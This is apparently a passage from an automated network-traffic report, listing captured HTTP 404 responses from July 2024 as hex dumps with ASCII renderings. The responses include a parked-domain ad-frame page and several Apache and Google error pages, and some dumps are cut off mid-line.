0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:11 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:20 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:30 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:33 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:36 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 